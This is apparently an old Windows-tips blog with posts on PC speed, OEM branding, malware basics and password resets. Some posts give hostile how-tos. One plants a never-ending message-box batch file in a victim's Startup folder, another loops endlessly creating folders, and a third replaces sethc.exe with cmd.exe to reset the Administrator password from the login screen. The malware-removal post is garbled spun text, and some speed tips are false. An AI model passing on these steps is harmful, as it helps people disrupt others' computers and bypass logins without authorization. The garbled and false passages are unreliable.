Pages

Monday, March 31, 2014

10 Tips To Improve Your System Speed – 95% Faster

Many of us think that when a computer starts performing poorly that it’s time to buy a new computer. Does your desktop or laptop often hang on the hour glass for several minutes at a time?
Slow Computer 10 Tips To Improve Your System Speed    95% Faster [Must See]
Always take the Follow Precautions below:-
1. Let your PC boot up completely before opening any applications.
2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3. Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4. Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM
5. Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6. Delete the temporary internet files regularly.
7. Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.To defragment your hard drive go to my computer icon on the desktop and right click it then go to manage options,there you will see “Disk defragmenter”. Click it then analyze and defrag your drives.You can also defrag your drives using third party software like AVG PC tools,Disk Defragmenter etc.
8. Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9. When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.
Extra Tip:- Keep your Desktop Screen as Clean as Possible, Deleted Unwanted Software and Keep Only Need Icon on your Desktop.
#Enjoy & Don’t Forget to Share this Post by Using the Facebook Like and Twitter Tweet Button if you Find this Post Meaningful.


Monday, February 10, 2014

Brand windows with your name

Let's do some fun stuff today....
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
-------------------------------------------------------------------------------------
[General]

Manufacturer=Your Name Here
Model=Your Model Here [Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
-------------------------------------------------------------------------------------

1. Save the file.

2. Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
3. Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here

Tuesday, January 7, 2014

Here is a fun, funny, and easy way to annoy your friends and family members by (harmlessly) messing with their computers. This one is a simple batch file that makes a message box pop up that says anything you want. The trick: no matter how many times you click OK, the message will never go away! Have fun!
Open notepad (under Start > All Programs > Accesories > Notepad Copy and paste these lines into Notepad: @echo off :top msg * Insert your message here goto top Be sure to delete "insert your message here" and replace it with your own message!
Go to File and click Save As. First look at "Save as File Type" near the bottom. It should say "Text Documents". Change it to "All Files". Type the name of your file into the "File Name" box, and be sure to end it with ".bat" instead of ".txt" Save it to your "My Documents" folder
Now, if you click on the batch file (which should look like a box with a gear inside it) in your Documents folder, the message should pop up. It will only go away if you restart the computer. To make it begin automatically when you (or someone else) logs in, copy the file from the Documents folder. Go to "My Computer", then go to: Local Disk > Documents and Settings > (Username of Person you want to annoy) > Start Menu > Programs > Startup. Paste the batch file into the Startup folder. Now it will run whenever they log in, and the person will never be able to find it!

Saturday, June 8, 2013

This will teach you how to make an unlimmited amount of folders  will just keep making folder untill you exit .I allowed it to run for 5 seconds and it made over 1,000 folders STEP-1  Open notepad and type  @echo off :top md %random% goto top STEP-2 Save it in a blank folder               as "Filename .bat" STEP-3 click on the icon The miracle pops up

Thursday, June 6, 2013

Computer Virus

A computer virus is a computer program that can replicate itself[1] and spread from one computer to another. The term "virus" is also commonly, but erroneously, used to refer to other types of malware, including but not limited to adware and spyware programs that do not have a reproductive ability. Malware includes computer viruses, computer worms, ransomware, trojan horses, keyloggers, most rootkits, spyware, dishonest adware, malicious BHOs and other malicious software. The majority of active malware threats are usually trojans or worms rather than viruses.[2] Malware such as trojan horses and worms is sometimes confused with viruses, which are technically different: a worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a trojan horse is a program that appears harmless but hides malicious functions. Worms and trojan horses, like viruses, may harm a computer system's data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to themselves. Some viruses do nothing beyond reproducing themselves. In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs (see code injection). If a user attempts to launch an infected program, the virus' code may be executed simultaneously. Viruses can be divided into two types based on their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect those targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself.
Antivirus software and other preventive measures
Many users install antivirus software that can detect and eliminate known viruses when the computer attempts to download or run the executable (which may be distributed as an email attachment, or on USB flash drives, for example). Some antivirus software blocks known malicious web sites that attempt to install malware. Antivirus software does not change the underlying capability of hosts to transmit viruses. Users must update their software regularly to patch security vulnerabilities ("holes"). Antivirus software also needs to be regularly updated in order to recognize the latest threats. The German AV Test Institute publishes evaluations of antivirus software for Windows[12] and Android.[13] Examples of Microsoft Windows anti virus and anti-malware software include the optional Microsoft Security Essentials[14] (for Windows XP, Vista and Windows 7) for real-time protection, the Windows Malicious Software Removal Tool[15] (now included with Windows (Security) Updates on "Patch Tuesday", the second Tuesday of each month), and Windows Defender (an optional download in the case of Windows XP).[16] Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use).[17] Some such free programs are almost as good as commercial competitors.[18] Common security vulnerabilities are assigned CVE IDs and listed in the US National Vulnerability Database. Secunia PSI[19] is an example of software, free for personal use, that will check a PC for vulnerable out-of-date software, and attempt to update it. Ransomware and phishing scam alerts appear as press releases on the Internet Crime Complaint Center noticeboard.
How Antivirus software works
There are two common methods that an antivirus software application uses to detect viruses, as described in the antivirus software article. The first, and by far the most common method of virus detection is using a list of virus signature definitions. This works by examining the content of the computer's memory (its RAM, and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives, or USB flash drives), and comparing those files against a database of known virus "signatures". Virus signatures are just strings of code that are used to identify individual viruses; for each virus, the anti-virus designer tries to choose a unique signature string that will not be found in a legitimate program. Different anti-virus programs use different "signatures" to identify viruses. The disadvantage of this detection method is that users are only protected from viruses that are detected by signatures in their most recent virus definition update, and not protected from new viruses (see "zero-day attack"). A second method to find viruses is to use a heuristic algorithm based on common virus behaviors. This method has the ability to detect new viruses for which anti-virus security firms have yet to define a "signature", but it also gives rise to more false positives than using signatures. False positives can be disruptive, especially in a commercial environment.
What do computer viruses do?
Through the course of using the Internet and your computer, you may have come in to contact with computer viruses. Many computer viruses are stopped before they can start, but there is still an ever growing concern as to what do computer viruses do and the list of common computer virus symptoms. A computer virus might corrupt or delete data on your computer, use your email program to spread itself to other computers, or even erase everything on your hard disk. Computer viruses are often spread by attachments in email messages or instant messaging messages. That is why it is essential that you never open email attachments unless you know who it's from and you are expecting it. Viruses can be disguised as attachments of funny images, greeting cards, or audio and video files. Computer viruses also spread through downloads on the Internet. They can be hidden in illicit software or other files or programs you might download. To help avoid computer viruses, it's essential that you keep your computer current with the latest updates and antivirus tools, stay informed about recent threats, run your computer as a standard user (not as administrator), and that you follow a few basic rules when you surf the Internet, download files, and open attachments. Once a virus is on your computer, its type or the method it used to get there is not as important as removing it and preventing further infection. You can Download your latest Avast Antivirus Here http://www.filehippo.com/download_avast_antivirus/
NOTE:
This Article was gotten from wikipedia and Microsoft.

Wednesday, May 22, 2013

Remove Trojan,Virus,Malware,Worm,Spyware from your Computer.

if you use a pc, read the paper, or watch the news, you will know about pc viruses or other viruses. These are those harmful applications that once they contaminate your machine will begin causing damage to your pc. What many people do not know is that there are many different kinds of strikes that are classified in the common type of Malware.
Malware
- Malware is development or information that are developed for the purpose of doing harm. Thus, viruses contains pc viruses, worms, Trojan viruses horse, malware, hijackers, and certain type of malware. This article will focus on those viruses that are regarded viruses, trojans, worms, and viruses, though this details can be used to eliminate the other kinds of viruses as well. We will not go into specific details about any one particular disease, but rather offer a wide summary of how these strikes can be eliminated. For the most aspect these guidelines should allow you to eliminate a great deal of strikes, but there are some that need special steps to be eliminated and these won't be covered under this guide. Before we continue it is essential understand the common viruses terms that you will be reading about.
Adware
- A program that produces pop-ups on your pc or shows ads. It is worth noting that not all malware applications are actually regarded viruses. There are many genuine applications that are given for 100 % free that display ads in their applications to be able to generate income. As long as this details is provided up front then they are generally not regarded viruses.
Backdoor
- A program that allows a distant customer to perform orders and projects on your pc without your authorization. These kinds of applications are generally used to release strikes on other computer systems, spread branded software or media, or crack other computer systems.
Dialler
- A program that generally calls a top quality rate number that has per minute expenses over and above the common call charge. These calls are with the purpose of accessing adult material.
Hijackers
- A program that efforts to hijack certain Online functions like course-plotting your begin web page to the hijacker's own begin web page, course-plotting searches to a unwanted internet look for engine, or substitute google look for from popular google with their own details.
Spyware
- A program that watches your action or details on your pc and delivers that details to a distant pc without your knowledge.
Trojan
- A program that has been developed to appear simple but has been deliberately developed to cause some harmful action or to offer a admission to your program.
Virus
- A program that when run, has the capability to self-replicate by infecting other applications and information on your pc. These applications can have many effects which range from cleaning your hard disk, showing a laugh in a small box, or doing nothing at all except to duplicate itself. These kinds of strikes tend to be nearby to your pc and not have the capability to propagate to another pc on their own. The word malware has wrongly become a common term that involves trojans, worms, and viruses.
Worm
- A program that when run, has the capability to propagate to other computer systems on its own using either mass-mailing techniques to contact information discovered on your pc or by using the Online to contaminate a distant pc using known protection gaps.
How these strikes start
Just like any program, to be able for the program to work, it must be began. Malware applications are no different in this respect and must be began in some fashion to be able to do what they were developed to do. For the most aspect these strikes run by creating a settings access in the Microsof company windows Computer registry to help create these applications begin when your pc starts. Unfortunately, though, in the Microsof company windows based pc there are many different ways to create a program begin which can create it difficult for the average pc customer to find personally. Fortunately for us, though, there are applications that allow us to cut through this misunderstandings and see the various applications that are instantly beginning when windows shoes. The program we recommend for this, because its 100 % free and specific, is Autoruns from Sysinternals. When you run this program it will record all the various applications that begin when your pc is kicked into Microsof company windows. For the most aspect, the majority of these applications are safe and should be left alone unless you know what you are doing or know you do not need them to run at start-up. At this factor, you should obtain Autoruns and try it out. Just run the Autoruns.exe and look at all the applications that begin instantly. Don't uncheck or remove anything at this factor. Just analyze the details to see an introduction to the amount of applications that are beginning instantly. When you understand what you are seeing, move on to the next area.
Use an anti-virus and anti-malware program to eliminate the infections
Make sure you are using an anti-virus program and that the anti-virus program is modified to use the latest explanations. If you do not currently have an anti-virus set up, you can select one from the following record and use it to check out and fresh your pc. The record below contains both 100 % free and professional anti-virus applications, but even the professional ones generally have a free test in which you can check out and fresh your pc before you have to pay for it. Kaspersky Anti-virus ESET Nod32 AVG Avast BitDefender Microsoft Security Essentials Trend Micro Antivir It is also advised that you set up and check out your pc with MalwareBytes' Anti-Malware and SUPERAntiSpyware. You can easily visit www.avast.com for the latest avast Security

Monday, May 13, 2013

How To Reset Password

How to reset Admin Password Method 1: Open the command prompt (start-> run-> Type cmd-> Enter) Now type username (e.g lijohnie) and hit Enter now the system will show you a list of user account on the Computer If you now want to reset the password 1. type net user (username) {e.g net user lijohnie} and hit Enter Now the system will ask you to enter the new password for the account. Thats it. You have succesfully reset the password for lijohnie without knowing the old password Method 2: 1. Goto C:/windows/system32 2. Copy cmd.exe and paste it on desktop 3. Rename cmd.exe to sethc.exe 4. Copy the sethc.exe to system32, when windows ask for over writing the file , then click yes. 5. Now press Shift key 5 times you will get cmd prompt close that 6. Log out from your guest account and at the login screen press shift key 5 times. 7. You will get command prompt there now type "NET USER ADMINISTRATOR mypassword" where "mypassword" can be any password and administrator is name of admin account, then press Enter 8. You will see "The command completed succefully" and then exit the command prompt Thats done...
 

Blogger news

Blogroll

About